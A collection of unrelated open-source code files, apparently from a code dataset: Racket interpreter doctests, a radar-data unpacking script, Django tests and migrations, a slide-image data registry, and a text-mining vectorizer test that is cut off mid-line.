test_unsafe_undefined(doctest): """ ! (require '#%unsafe) ! (struct p (x y) #:mutable #:transparent) > (check-not-unsafe-undefined 1 'a) 1 E (check-not-unsafe-undefined unsafe-undefined 'a) > (check-not-unsafe-undefined/assign 1 'a) 1 E (check-not-unsafe-undefined/assign unsafe-undefined 'a) > (chaperone-struct-unsafe-undefined 1) 1 > (let* ([x (p 1 2)] [y (chaperone-struct-unsafe-undefined x)] [_ (set-p-y! y 3)] [z (p-y y)]) z) 3 """ def test_dynamic_wind(doctest): """ > (dynamic-wind (lambda () 1) (lambda () 2) (lambda () 3)) 2 """ def test_dynamic_wind2(): m = run_mod( """ #lang pycket (require racket/control) (define acc 0) (define v (let/cc k (dynamic-wind (lambda () (set! acc (+ acc 1))) (lambda () (set! acc (+ acc 1)) 42) (lambda () (set! acc (+ acc 1)))))) """) acc = m.defs[values.W_Symbol.make("acc")] v = m.defs[values.W_Symbol.make("v")] assert isinstance(acc, values.W_Cell) acc = acc.get_val() assert isinstance(v, values.W_Fixnum) and v.value == 42 assert isinstance(acc, values.W_Fixnum) and acc.value == 3 def test_dynamic_wind3(): m = run_mod( """ #lang pycket (require racket/control) (define val (let/ec k0 (let/ec k1 (dynamic-wind void (lambda () (k0 'cancel)) (lambda () (k1 'cancel-canceled)))))) """) val = m.defs[values.W_Symbol.make("val")] assert val is values.W_Symbol.make("cancel-canceled") def test_dynamic_wind4(): m = run_mod( """ #lang pycket (require racket/control) (define val (let* ([x (make-parameter 0)] [l null] [add (lambda (a b) (set! l (append l (list (cons a b)))))]) (let ([k (parameterize ([x 5]) (dynamic-wind (lambda () (add 1 (x))) (lambda () (parameterize ([x 6]) (let ([k+e (let/cc k (cons k void))]) (add 2 (x)) ((cdr k+e)) (car k+e)))) (lambda () (add 3 (x)))))]) (parameterize ([x 7]) (let/cc esc (k (cons void esc))))) l)) (define equal (equal? val '((1 . 5) (2 . 6) (3 . 5) (1 . 5) (2 . 6) (3 . 5)))) """) val = m.defs[values.W_Symbol.make("val")] equal = m.defs[values.W_Symbol.make("equal")] assert equal is values.w_true def test_bytes_conversions(): m = run_mod( """ #lang pycket (define a (real->floating-point-bytes 1 8 #f)) (define b (integer-bytes->integer a #f)) """) a = values.W_Symbol.make("a") b = values.W_Symbol.make("b") vb = m.defs[b] assert isinstance(vb, values.W_Fixnum) and vb.value == 4607182418800017408 def test_build_path(doctest): """ > (path->string (build-path "/usr/bin" "bash")) "/usr/bin/bash" > (path->string (build-path "/usr" "bin" 'up "bash")) "/usr/bin/../bash" > (path->string (build-path "/usr" "bin" 'same "bash")) "/usr/bin/./bash" > (path->string (build-path "/")) "/" > (path->string (build-path "/" "etc")) "/etc" """ def test_path_to_complete_path(): m = run_mod( """ #lang pycket (define p (path->complete-path "test.rkt")) """) p = m.defs[values.W_Symbol.make("p")] cwd = os.getcwd() assert isinstance(p, values.W_Path) full = cwd + "/" + "test.rkt" assert full == p.path def test_explode_path(doctest): # we use kernel's map to save loading """ ! (require '#%kernel) ! (define-values (unpath) (lambda (p) (if (path? p) (path->string p) p))) > (map path->string (explode-path "/home/spenser/src/pycket")) '("/" "home" "spenser" "src" "pycket") > (map unpath (explode-path "/home/spenser/src/pycket/.././.")) '("/" "home" "spenser" "src" "pycket" up same same) > (map unpath (explode-path "home/spenser/src/pycket/.././.")) '("home" "spenser" "src" "pycket" up same same) > (map unpath (explode-path "a//b")) '("a" "b") > (map unpath (explode-path "a//")) '("a") """ assert doctest def test_file_size(doctest): """ > (file-size "./pycket/test/sample_file.txt") 256 """ assert doctest def test_andmap(doctest): """ ! (require (only-in '#%kernel andmap)) > (andmap even? '()) #t > (andmap even? '(1)) #f > (andmap even? '(2)) #t > (andmap even? '(1 2 3 4 5 6 7 8 9)) #f > (andmap even? '(2 4 6 8)) #t > (andmap odd? '()) #t > (andmap odd? '(1)) #t > (andmap odd? '(2)) #f > (andmap odd? '(1 2 3 4 5 6 7 8 9)) #f > (andmap odd? '(2 4 6 8)) #f """ def test_ormap(doctest): """ ! (require (only-in '#%kernel ormap)) > (ormap even? '()) #f > (ormap even? '(1)) #f > (ormap even? '(2)) #t > (ormap even? '(1 2 3 4 5 6 7 8 9)) #t > (ormap even? '(2 4 6 8)) #t > (ormap odd? '()) #f > (ormap odd? '(1)) #t > (ormap odd? '(2)) #f > (ormap odd? '(1 2 3 4 5 6 7 8 9)) #t > (ormap odd? '(2 4 6 8)) #f """ @pytest.mark.skip(reason="we only do correlated") def test_syntax_to_datum(doctest): """ > (syntax->datum #'a) 'a > (syntax->datum #'(x . y)) '(x . y) > (syntax->datum #'#(1 2 (+ 3 4))) '#(1 2 (+ 3 4)) > (syntax->datum #'#&"hello world") '#&"hello world" ;;;;; XXX: Ordering problem? ;> (syntax->datum #'#hash((imperial . "yellow") (festival . "green"))) ;'#hash((festival . "green") (imperial . "yellow")) > (syntax->datum #'#(point 3 4)) '#(point 3 4) > (syntax->datum #'3) 3 > (syntax->datum #'"three") "three" > (syntax->datum #'#t) #t """ @skip def test_syntax_e(doctest): """ > (syntax-e #'a) 'a > (let ((s (syntax-e #'(x . y)))) (and (pair? s) (syntax? (car s)) (syntax? (cdr s)))) ;'(#<syntax:11:0 x> . #<syntax:11:0 y>) #t > (let ((s (syntax-e #'#(1 2 (+ 3 4))))) (and (list? s) (syntax? (list-ref s 1)))) ;'#(#<syntax:12:0 1> #<syntax:12:0 2> #<syntax:12:0 (+ 3 4)>) #t > (let ((s (syntax-e #'#&"hello world"))) (and (box? s) (syntax? (unbox s)))) ;'#&#<syntax:13:0 "hello world"> #t ;;;;; XXX: Ordering problem? ;> (syntax-e #'#hash((imperial . "yellow") (festival . "green"))) ;'#hash((festival . #<syntax:14:0 "green">) (imperial . #<syntax:14:0 "yellow">)) > (let ((s (syntax-e #'#(point 3 4)))) (and (vector? s) (syntax? (vector-ref s 1)))) ;'#(#<syntax:15:0 point> #<syntax:15:0 3> #<syntax:15:0 4>) #t > (syntax-e #'3) 3 > (syntax-e #'"three") "three" > (syntax-e #'#t) #t """ def test_relative_path(doctest): """ > (relative-path? "/home/spenser") #f > (relative-path? "~/bin/racket") #t > (relative-path? "./../bin/racket") #t > (relative-path? (string->path "/home/spenser")) #f > (relative-path? (string->path "~/bin/racket")) #t > (relative-path? (string->path "./../bin/racket")) #t """ def test_continuation_prompt_functions(doctest): u""" ! (define tag (make-continuation-prompt-tag)) ! (define (escape v) (abort-current-continuation tag (lambda () v))) > (call-with-continuation-prompt (λ () (+ 1 (+ 1 (+ 1 (+ 1 (+ 1 (+ 1 (escape 0)))))))) tag) 0 > (+ 1 (call-with-continuation-prompt (lambda () (+ 1 (+ 1 (+ 1 (+ 1 (+ 1 (+ 1 (escape 0)))))))) tag)) 1 > (call-with-continuation-prompt (λ () (+ 1 (+ 1 (+ 1 (+ 1 (+ 1 (+ 1 (escape 0)))))))) tag (λ (x) (+ 10 (x)))) 10 > (+ 1 (call-with-continuation-prompt (lambda () (+ 1 (+ 1 (+ 1 (+ 1 (+ 1 (+ 1 (escape 0)))))))) tag (λ (x) (+ (x) 10)))) 11 """ def test_continuation_prompt_available(doctest): u""" ! (define tag (make-continuation-prompt-tag)) ! (define tag2 (make-continuation-prompt-tag)) > (call-with-continuation-prompt (λ () (continuation-prompt-available? tag)) tag) #t > (call-with-continuation-prompt (λ () (continuation-prompt-available? tag)) tag2) #f """ def test_raise_exception(doctest): u""" ! (require racket/base) ! (define-struct (my-exception exn:fail:user) ()) > (with-handlers ([number? (lambda (n) (+ n 5))]) (raise 18 #t)) 23 > (with-handlers ([my-exception? (lambda (e) #f)]) (+ 5 (raise (make-my-exception "failed" (current-continuation-marks))))) #f > (with-handlers ([number? (λ (n) (+ n 5))]) (with-handlers ([string? (λ (n) (string-append n " caught ya"))]) (raise 8))) 13 """ def test_ctype_basetype(doctest): u""" ! (require '#%foreign) > (ctype-basetype #f) #f > (ctype-basetype _int8) 'int8 > (ctype-basetype _uint32) 'uint32 > (ctype-basetype (make-ctype _int8 #f #f)) 'int8 > (ctype-basetype (make-ctype _int8 (λ (x) x) #f)) _int8 """ def test_ctype_basetype(doctest): u""" ! (require '#%foreign) > (equal? (ctype-sizeof _int8) (ctype-sizeof (make-ctype _int8 #f #f))) #t """ def test_procedure_result_arity(doctest): """ ! (define-struct node (x y z)) > (procedure-result-arity car) 1 > (procedure-result-arity cdr) 1 > (procedure-result-arity node-x) 1 """ def test_string_to_keyword(doctest): """ > (eq? (string->keyword "hello") (values '#:hello)) #t > (eq? (string->keyword "muffin button") (values '#:|muffin button|)) #t """ def test_bytes_to_path_element(doctest): """ > (path->string (bytes->path-element (string->bytes/locale "spenser"))) "spenser" """ def test_bytes_to_immutable_bytes(doctest): """ > (immutable? (bytes->immutable-bytes (bytes 1 2 3))) #t > (equal? (bytes->immutable-bytes (bytes 1 2 3)) (bytes 1 2 3)) #t """ def test_bytes_to_list(doctest): """ > (bytes->list #"Apple") '(65 112 112 108 101) """ def test_split_path(doctest): """ ! (define-values (base1 name1 must-be-dir1) (split-path "abc/def")) ! (define-values (base2 name2 must-be-dir2) (split-path "./abc/def")) ! (define-values (base3 name3 must-be-dir3) (split-path "..")) ! (define-values (base4 name4 must-be-dir4) (split-path ".")) ! (define-values (base5 name5 must-be-dir5) (split-path "foo")) ! (define-values (base6 name6 must-be-dir6) (split-path "bcd/")) ! (define-values (base7 name7 must-be-dir7) (split-path "./")) ! (define-values (base8 name8 must-be-dir8) (split-path "/etc")) ! (define-values (base9 name9 must-be-dir9) (split-path "/")) ! (define-values (base10 name10 must-be-dir10) (split-path "/etc/")) > base1 (string->path "abc/") > name1 (string->path "def") > must-be-dir1 #f > base2 (string->path "./abc/") > name2 (string->path "def") > must-be-dir2 #f > base3 'relative > name3 'up > must-be-dir3 #t > base4 'relative > name4 'same > must-be-dir4 #t > base5 'relative > name5 (string->path "foo") > must-be-dir5 #f > base6 'relative > name6 (string->path "bcd") > must-be-dir6 #t > base7 'relative > name7 'same > must-be-dir7 #t > base8 (string->path "/") > name8 (string->path "etc") > must-be-dir8 #f > base9 #f > name9 (string->path "/") > must-be-dir9 #t > base10 (string->path "/") > name10 (string->path "etc") > must-be-dir10 #t > (let-values ([(a b c) (split-path (build-path "b" (quote up)))]) (list (path->string a) b c)) '("b/" up #t) """ def test_fail_user_simple(doctest): """ E (raise-user-error "foo") """ def test_integer_to_integer_bytes(doctest): r""" > (integer->integer-bytes 0 2 #t) #"\0\0" > (integer->integer-bytes -1 2 #t) #"\377\377" > (integer->integer-bytes 65535 2 #f) #"\377\377" > (integer->integer-bytes 0 2 #t #t) #"\0\0" > (integer->integer-bytes -1 2 #t #t) #"\377\377" > (integer->integer-bytes -256 2 #t #t) #"\377\0" > (integer->integer-bytes -255 2 #t #t) #"\377\1" > (integer->integer-bytes 511 2 #t #t) #"\1\377" > (integer->integer-bytes 513 2 #f #f) #"\1\2" > (integer->integer-bytes 0 2 #t #f) #"\0\0" > (integer->integer-bytes -1 2 #t #f) #"\377\377" > (integer->integer-bytes 65535 2 #f #f) #"\377\377" > (integer->integer-bytes 511 2 #t #f) #"\377\1" > (integer->integer-bytes -255 2 #t #f) #"\1\377" > (integer->integer-bytes 258 2 #f #t) #"\1\2" > (integer->integer-bytes 0 4 #t) #"\0\0\0\0" > (integer->integer-bytes -1 4 #t) #"\377\377\377\377" > (integer->integer-bytes 4294967295 4 #f) #"\377\377\377\377" > (integer->integer-bytes 0 4 #t #t) #"\0\0\0\0" > (integer->integer-bytes -1 4 #t #t) #"\377\377\377\377" > (integer->integer-bytes 4294967295 4 #f #t) #"\377\377\377\377" > (integer->integer-bytes -16777216 4 #t #t) #"\377\0\0\0" > (integer->integer-bytes 255 4 #t #t) #"\0\0\0\377" > (integer->integer-bytes 1835103348 4 #t #t) #"matt" > (integer->integer-bytes 1953784173 4 #t #f) #"matt" > (integer->integer-bytes 0 8 #t #t) #"\0\0\0\0\0\0\0\0" > (integer->integer-bytes -1 8 #t #f) #"\377\377\377\377\377\377\377\377" > (integer->integer-bytes 4294967295 8 #t #f) #"\377\377\377\377\0\0\0\0" > (integer->integer-bytes -4294967296 8 #t #f) #"\0\0\0\0\377\377\377\377" > (integer->integer-bytes 8589934591 8 #t #f) #"\377\377\377\377\1\0\0\0" > (integer->integer-bytes -4294967295 8 #t #f) #"\1\0\0\0\377\377\377\377" > (integer->integer-bytes 0 8 #t #f) #"\0\0\0\0\0\0\0\0" > (integer->integer-bytes -1 8 #t #f) #"\377\377\377\377\377\377\377\377" > (integer->integer-bytes -4294967296 8 #t #t) #"\377\377\377\377\0\0\0\0" > (integer->integer-bytes 4294967295 8 #t #t) #"\0\0\0\0\377\377\377\377" > (integer->integer-bytes -4294967295 8 #t #t) #"\377\377\377\377\0\0\0\1" > (integer->integer-bytes 8589934591 8 #t #t) #"\0\0\0\1\377\377\377\377" """ # Tests for bigint # > (integer->integer-bytes 18446744073709551615 8 #f #f) # #"\377\377\377\377\377\377\377\377" # > (integer->integer-bytes 18446744073709551615 8 #f #f) # #"\377\377\377\377\377\377\377\377" def test_integer_bytes_to_integer(doctest): r""" > (integer-bytes->integer #"\0\0" #t) 0 > (integer-bytes->integer #"\377\377" #t) -1 > (integer-bytes->integer #"\377\377" #f) 65535 > (integer-bytes->integer #"\0\0" #t #t) 0 > (integer-bytes->integer #"\377\377" #t #t) -1 > (integer-bytes->integer #"\377\377" #f #t) 65535 > (integer-bytes->integer #"\377\0" #t #t) -256 > (integer-bytes->integer #"\377\1" #t #t) -255 > (integer-bytes->integer #"\1\377" #t #t) 511 > (integer-bytes->integer #"\1\2" #f #f) 513 > (integer-bytes->integer #"\0\0" #t #f) 0 > (integer-bytes->integer #"\377\377" #t #f) -1 > (integer-bytes->integer #"\377\377" #f #f) 65535 > (integer-bytes->integer #"\377\1" #t #f) 511 > (integer-bytes->integer #"\1\377" #t #f) -255 > (integer-bytes->integer #"\1\2" #f #t) 258 > (integer-bytes->integer #"\0\0\0\0" #t) 0 > (integer-bytes->integer #"\377\377\377\377" #t) -1 > (integer-bytes->integer #"\377\377\377\377" #f) 4294967295 > (integer-bytes->integer #"\0\0\0\0" #t #t) 0 > (integer-bytes->integer #"\377\377\377\377" #t #t) -1 > (integer-bytes->integer #"\377\377\377\377" #f #t) 4294967295 > (integer-bytes->integer #"\377\0\0\0" #t #t) -16777216 > (integer-bytes->integer #"\0\0\0\377" #t #t) 255 > (integer-bytes->integer #"\0\0\0\0" #t #f) 0 > (integer-bytes->integer #"\377\377\377\377" #t #f) -1 > (integer-bytes->integer #"\377\377\377\377" #f #f) 4294967295 > (integer-bytes->integer #"\377\0\0\1" #t #f) 16777471 > (integer-bytes->integer #"\0\0\0\377" #t #f) -16777216 > (integer-bytes->integer #"\1\0\0\377" #t #f) -16777215 > (integer-bytes->integer #"matt" #t #t) 1835103348 > (integer-bytes->integer #"matt" #t #f) 1953784173 > (integer-bytes->integer #"\0\0\0\0\0\0\0\0" #t #t) 0 > (integer-bytes->integer #"\377\377\377\377\377\377\377\377" #t #f) -1 > (integer-bytes->integer #"\377\377\377\377\377\377\377\377" #f #f) 18446744073709551615 > (integer-bytes->integer #"\377\377\377\377\0\0\0\0" #t #f) 4294967295 > (integer-bytes->integer #"\0\0\0\0\377\377\377\377" #t #f) -4294967296 > (integer-bytes->integer #"\377\377\377\377\1\0\0\0" #t #f) 8589934591 > (integer-bytes->integer #"\1\0\0\0\377\377\377\377" #t #f) -4294967295 > (integer-bytes->integer #"\0\0\0\0\0\0\0\0" #t #f) 0 > (integer-bytes->integer #"\377\377\377\377\377\377\377\377" #t #f) -1 > (integer-bytes->integer #"\377\377\377\377\377\377\377\377" #f #f) 18446744073709551615 > (integer-bytes->integer #"\377\377\377\377\0\0\0\0" #t #t) -4294967296 > (integer-bytes->integer #"\0\0\0\0\377\377\377\377" #t #t) 4294967295 > (integer-bytes->integer #"\377\377\377\377\0\0\0\1" #t #t) -4294967295 > (integer-bytes->integer #"\0\0\0\1\377\377\377\377" #t #t) 8589934591 """ def test_logger_operations(doctest): """ > (logger-name (make-logger 'example)) 'example """ def test_path_less_than(doctest): """ > (path<? (string->path "a") (string->path "b")) #t > (path<? (string->path "") (string->path "")) #f > (path<? (string->path "a") (string->path "")) #f > (path<? (string->path "") (string->path "a")) #t > (path<? (string->path "/home/spenser") (string->path "/home")) #f > (path<? (string->path "/home") (string->path "/home/spenser")) #t """ def test_string_to_bytes_latin1(doctest): u""" ! (define b (bytes->string/latin-1 (bytes 254 211 209 165))) > (string->bytes/latin-1 b) #"\376\323\321\245" > (bytes->string/latin-1 (string->bytes/latin-1 b)) "þÓÑ¥" """ def test_current_seconds(doctest): """ > (exact-integer? (current-seconds)) #t """ def test_true_object(doctest): """ ! (require '#%kernel) > (true-object? #t) #t > (true-object? #f) #f > (true-object? 3) #f """ def test_char_foldcase(doctest): ur""" > (char-foldcase #\A) #\a > (char-foldcase #\Σ) #\σ > (char-foldcase #\ς) #\σ > (char-foldcase #\space) #\space """ def test_procedure_specialize(doctest): """ ! (define f (let ([g 5]) (lambda (x) (+ g x)))) > (f 1) 6 > ((procedure-specialize f) 1) 6 """ def test_symbol_less_than(doctest): """ > (symbol<? 'a 'b) #t > (symbol<? 'a 'a) #f > (symbol<? 'b 'a) #f """
contrib/stack/stripmapStack/unpackFrame_ROIPAC_raw.py
vincentschut/isce2
1,133
11096104
<reponame>vincentschut/isce2 #!/usr/bin/env python3 import isce from isceobj.Sensor import createSensor import shelve import argparse import glob from isceobj.Util import Poly1D from isceobj.Planet.AstronomicalHandbook import Const import os from mroipac.dopiq.DopIQ import DopIQ import copy def cmdLineParse(): ''' Command line parser. ''' parser = argparse.ArgumentParser(description='Unpack raw data and store metadata in pickle file.') parser.add_argument('-i','--input', dest='rawfile', type=str, required=True, help='Input ROI_PAC file') parser.add_argument('-r','--hdr', dest='hdrfile', type=str, required=True, help='Input hdr (orbit) file') parser.add_argument('-o', '--output', dest='slcdir', type=str, required=True, help='Output data directory') return parser.parse_args() def unpack(rawname, hdrname, slcname): ''' Unpack raw to binary file. ''' if not os.path.isdir(slcname): os.mkdir(slcname) date = os.path.basename(slcname) obj = createSensor('ROI_PAC') obj.configure() obj._rawFile = rawname obj._hdrFile = hdrname obj.output = os.path.join(slcname, date+'.raw') print(obj._rawFile) print(obj._hdrFile) print(obj.output) obj.extractImage() obj.frame.getImage().renderHdr() #####Estimate doppler dop = DopIQ() dop.configure() img = copy.deepcopy(obj.frame.getImage()) img.setAccessMode('READ') dop.wireInputPort('frame', object=obj.frame) dop.wireInputPort('instrument', object=obj.frame.instrument) dop.wireInputPort('image', object=img) dop.calculateDoppler() dop.fitDoppler() fit = dop.quadratic coef = [fit['a'], fit['b'], fit['c']] print(coef) obj.frame._dopplerVsPixel = [x*obj.frame.PRF for x in coef] pickName = os.path.join(slcname, 'raw') with shelve.open(pickName) as db: db['frame'] = obj.frame if __name__ == '__main__': ''' Main driver. ''' inps = cmdLineParse() if inps.slcdir.endswith('/'): inps.slcdir = inps.slcdir[:-1] unpack(inps.rawfile, inps.hdrfile, inps.slcdir)
hs_core/tests/api/native/test_set_public.py
hydroshare/hydroshare
178
11096115
<reponame>hydroshare/hydroshare import os import tempfile import shutil from unittest import TestCase, skip from django.contrib.auth.models import Group, User from django.core.exceptions import ValidationError from hs_core.hydroshare import resource from hs_core.models import GenericResource from hs_core.testing import MockIRODSTestCaseMixin from hs_core import hydroshare class TestCreateResource(MockIRODSTestCaseMixin, TestCase): def setUp(self): super(TestCreateResource, self).setUp() self.tmp_dir = tempfile.mkdtemp() self.hs_group, _ = Group.objects.get_or_create(name='Hydroshare Author') # create a user self.user = hydroshare.create_account( '<EMAIL>', username='mytestuser', first_name='some_first_name', last_name='some_last_name', superuser=False, groups=[self.hs_group] ) # create files file_one = os.path.join(self.tmp_dir, "test1.txt") file_one_write = open(file_one, "w") file_one_write.write("Putting something inside") file_one_write.close() # open files for read and upload self.file_one = open(file_one, "rb") self.res = resource.create_resource( 'GenericResource', self.user, 'My Test Resource', files=(self.file_one,) ) def tearDown(self): super(TestCreateResource, self).tearDown() self.file_one.close() shutil.rmtree(self.tmp_dir) self.res.delete() self.user.uaccess.delete() self.user.delete() self.hs_group.delete() User.objects.all().delete() Group.objects.all().delete() GenericResource.objects.all().delete() def test_resource_setAVU_and_getAVU(self): """ test that setAVU and getAVU work predictably """ self.res.setAVU("foo", "bar") self.assertEqual(self.res.getAVU("foo"), "bar") self.res.setAVU("foo", "cat") self.assertEqual(self.res.getAVU("foo"), "cat") @skip("TODO: was not running before python3 upgrade") def test_set_public_and_set_discoverable(self): """ test that resource.set_public and resource.set_discoverable work properly. """ # default resource was constructed to be publishable self.assertTrue(self.res.can_be_public_or_discoverable) self.assertFalse(self.res.raccess.discoverable) self.assertFalse(self.res.raccess.public) self.assertEqual(self.res.getAVU('isPublic'), 'false') self.res.set_public(False) self.assertFalse(self.res.raccess.discoverable) self.assertFalse(self.res.raccess.public) self.assertEqual(self.res.getAVU('isPublic'), 'false') self.res.set_discoverable(True) self.assertTrue(self.res.raccess.discoverable) self.assertFalse(self.res.raccess.public) self.assertEqual(self.res.getAVU('isPublic'), 'false') self.res.set_discoverable(False) self.assertFalse(self.res.raccess.discoverable) self.assertFalse(self.res.raccess.public) self.res.set_public(True) self.assertTrue(self.res.raccess.discoverable) self.assertTrue(self.res.raccess.public) self.assertEqual(self.res.getAVU('isPublic'), 'true') self.res.set_discoverable(False) self.assertFalse(self.res.raccess.discoverable) self.assertFalse(self.res.raccess.public) self.assertEqual(self.res.getAVU('isPublic'), 'false') # now try some things that won't work # first make the resource unacceptable to be discoverable self.res.metadata.title.value = '' self.res.metadata.title.save() self.assertFalse(self.res.can_be_public_or_discoverable) with self.assertRaises(ValidationError): self.res.set_public(True) self.assertFalse(self.res.raccess.discoverable) self.assertFalse(self.res.raccess.public) self.assertEqual(self.res.getAVU('isPublic'), 'false') with self.assertRaises(ValidationError): self.res.set_discoverable(True) @skip("TODO: was not running before python3 upgrade") def test_update_public_and_discoverable(self): """ test that resource.update_public_and_discoverable works properly. """ self.assertTrue(self.res.can_be_public_or_discoverable) self.res.update_public_and_discoverable() self.assertFalse(self.res.raccess.discoverable) self.assertFalse(self.res.raccess.public) self.assertEqual(self.res.getAVU('isPublic'), 'false') # intentionally and greviously violate constraints self.res.raccess.discoverable = True self.res.raccess.public = True self.res.raccess.save() self.res.setAVU('isPublic', True) # There's a problem now self.assertFalse(self.res.can_be_public_or_discoverable) self.assertEqual(self.res.getAVU('isPublic'), 'true') # update should correct the problem self.res.update_public_and_discoverable() self.assertFalse(self.res.raccess.discoverable) self.assertFalse(self.res.raccess.public) self.assertEqual(self.res.getAVU('isPublic'), 'false')
tracing/tracing/metrics/discover_unittest.py
tingshao/catapult
2,151
11096130
# Copyright (c) 2016 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import unittest from tracing.metrics import discover class MetricsDiscoverUnittest(unittest.TestCase): def testMetricsDiscoverEmpty(self): self.assertFalse(discover.DiscoverMetrics([])) def testMetricsDiscoverNonEmpty(self): self.assertEquals(['sampleMetric'], discover.DiscoverMetrics( ['/tracing/metrics/sample_metric.html'])) def testMetricsDiscoverMultipleMetrics(self): self.assertGreater( len(discover.DiscoverMetrics( ['/tracing/metrics/all_metrics.html'])), 1)
nmigen/compat/sim/__init__.py
psumesh/nmigen
528
11096150
from amaranth.compat.sim import * from amaranth.compat.sim import __all__ import warnings warnings.warn("instead of nmigen.compat.sim, use amaranth.compat.sim", DeprecationWarning, stacklevel=2)
src/richie/apps/courses/migrations/0012_add_translation_model_for_licence_fields.py
leduong/richie
174
11096151
# Generated by Django 2.2.9 on 2020-01-02 15:07 import django.db.models.deletion from django.db import migrations, models import parler.models import richie.apps.core.fields.multiselect class Migration(migrations.Migration): dependencies = [("courses", "0011_deprecate_untranslated_licence_fields")] operations = [ migrations.CreateModel( name="LicenceTranslation", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ( "language_code", models.CharField( db_index=True, max_length=15, verbose_name="Language" ), ), ("name", models.CharField(max_length=200, verbose_name="name")), ("content", models.TextField(default="", verbose_name="content")), ( "master", models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="translations", to="courses.Licence", ), ), ], options={ "verbose_name": "Licence translation", "db_table": "richie_licence_translation", "unique_together": {("language_code", "master")}, }, bases=(parler.models.TranslatedFieldsModelMixin, models.Model), ) ]
histolab/data/_registry.py
Toughee/histolab
149
11096172
<reponame>Toughee/histolab # flake8: noqa # in legacy datasets we need to put our sample data within the data dir legacy_datasets = ["cmu_small_region.svs"] # Registry of datafiles that can be downloaded along with their SHA256 hashes # To generate the SHA256 hash, use the command # openssl sha256 filename registry = { "histolab/broken.svs": "b1325916876afa17ad5e02d2e7298ee883e758ed25369470d85bc0990e928e11", "histolab/kidney.png": "5c6dc1b9ae10a2865302d9c8eda360362ec47732cb3e9766c38ed90cb9f4c371", "data/cmu_small_region.svs": "ed92d5a9f2e86df67640d6f92ce3e231419ce127131697fbbce42ad5e002c8a7", "aperio/JP2K-33003-1.svs": "6205ccf75a8fa6c32df7c5c04b7377398971a490fb6b320d50d91f7ba6a0e6fd", "aperio/JP2K-33003-2.svs": "1a13cef86b55b51127cebd94a1f6069f7de494c98e3e708640d1ce7181d9e3fd", "tcga/breast/9c960533-2e58-4e54-97b2-8454dfb4b8c8": "03f542afa2d70224d594b2cca33b99977a5c0e41b1a8d03471ab3cf62ea3c4b3", "tcga/breast/da36d3aa-9b19-492a-af4f-cc028a926d96": "2172cca68a8b7722d281174a74c4f112d0f52fc71710d7d605f401731c783fc9", "tcga/breast/f8b4cee6-9149-45b4-ae53-82b0547e1e34": "55c694262c4d44b342e08eb3ef2082eeb9e9deeb3cb445e4776419bb9fa7dc21", "tcga/breast/31e248bf-ee24-4d18-bccb-47046fccb461": "95163831d9076bb5e5b21790933dee9535a3607ba35bd6ae425374a45ecb1ba6", "tcga/prostate/6b725022-f1d5-4672-8c6c-de8140345210": "305c80e28227b25fdd0cc24726da4cf038380b4326e25c6518ffe23051a25ac0", "tcga/ovarian/b777ec99-2811-4aa4-9568-13f68e380c86": "f8e5059a0c9f8c026cfb2613cddef6562f8cdbd5954580282e2afa41d2f86a8c", "9798433/?format=tif": "7db49ff9fc3f6022ae334cf019e94ef4450f7d4cf0d71783e0f6ea82965d3a52", "9798554/?format=tif": "8a4318ac713b4cf50c3314760da41ab7653e10e90531ecd0c787f1386857a4ef", } APERIO_REPO_URL = "http://openslide.cs.cmu.edu/download/openslide-testdata/Aperio" TCGA_REPO_URL = "https://api.gdc.cancer.gov/data" IDR_REPO_URL = "https://idr.openmicroscopy.org/webclient/render_image_download" registry_urls = { "histolab/broken.svs": "https://raw.githubusercontent.com/histolab/histolab/master/tests/fixtures/svs-images/broken.svs", "histolab/kidney.png": "https://user-images.githubusercontent.com/4196091/100275351-132cc880-2f60-11eb-8cc8-7a3bf3723260.png", "aperio/JP2K-33003-1.svs": f"{APERIO_REPO_URL}/JP2K-33003-1.svs", "aperio/JP2K-33003-2.svs": f"{APERIO_REPO_URL}/JP2K-33003-2.svs", "tcga/breast/9c960533-2e58-4e54-97b2-8454dfb4b8c8": f"{TCGA_REPO_URL}/9c960533-2e58-4e54-97b2-8454dfb4b8c8", "tcga/breast/da36d3aa-9b19-492a-af4f-cc028a926d96": f"{TCGA_REPO_URL}/da36d3aa-9b19-492a-af4f-cc028a926d96", "tcga/breast/f8b4cee6-9149-45b4-ae53-82b0547e1e34": f"{TCGA_REPO_URL}/f8b4cee6-9149-45b4-ae53-82b0547e1e34", "tcga/breast/31e248bf-ee24-4d18-bccb-47046fccb461": f"{TCGA_REPO_URL}/31e248bf-ee24-4d18-bccb-47046fccb461", "tcga/prostate/6b725022-f1d5-4672-8c6c-de8140345210": f"{TCGA_REPO_URL}/6b725022-f1d5-4672-8c6c-de8140345210", "tcga/ovarian/b777ec99-2811-4aa4-9568-13f68e380c86": f"{TCGA_REPO_URL}/b777ec99-2811-4aa4-9568-13f68e380c86", "9798433/?format=tif": f"{IDR_REPO_URL}/9798433/?format=tif", "9798554/?format=tif": f"{IDR_REPO_URL}/9798554/?format=tif", } legacy_registry = { ("data/" + filename): registry["data/" + filename] for filename in legacy_datasets }
semtorch/models/archs/backbones/__init__.py
WaterKnight1998/SemTorch
145
11096185
from .build import BACKBONE_REGISTRY, get_segmentation_backbone from .xception import * from .mobilenet import * from .resnet import *
tests/test_vectorizer.py
vj1494/kindred
141
11096212
<reponame>vj1494/kindred import numpy as np import kindred import os import json from kindred.datageneration import generateData,generateTestData def check(valueName,value): write = False scriptDir = os.path.dirname(__file__) jsonPath = os.path.join(scriptDir,'data','vectorizer','expected.json') if os.path.isfile(jsonPath): with open(jsonPath) as f: data = json.load(f) else: data = {} if write: data[valueName] = value with open(jsonPath,'w') as f: json.dump(data,f,indent=2,sort_keys=True) assert valueName in data assert data[valueName] == value def test_simpleVectorizer_binary(): text = '<drug id="1">Erlotinib</drug> is a common treatment for <cancer id="2">NSCLC</cancer>. <drug id="3">Aspirin</drug> is the main cause of <disease id="4">boneitis</disease> . <relation type="treats" subj="1" obj="2" />' corpus = kindred.Corpus(text,loadFromSimpleTag=True) parser = kindred.Parser() parser.parse(corpus) candidateBuilder = kindred.CandidateBuilder() candidateRelations = candidateBuilder.build(corpus) # We'll just get the vectors for the entityTypes vectorizer = kindred.Vectorizer(featureChoice=["entityTypes"]) vectors = vectorizer.fit_transform(candidateRelations) vectorsCSR = vectors.tocsr() rows,cols = vectors.nonzero() expected = {(0, 2): 1.0, (0, 3): 1.0, (1, 0): 1.0, (1, 5): 1.0, (2, 2): 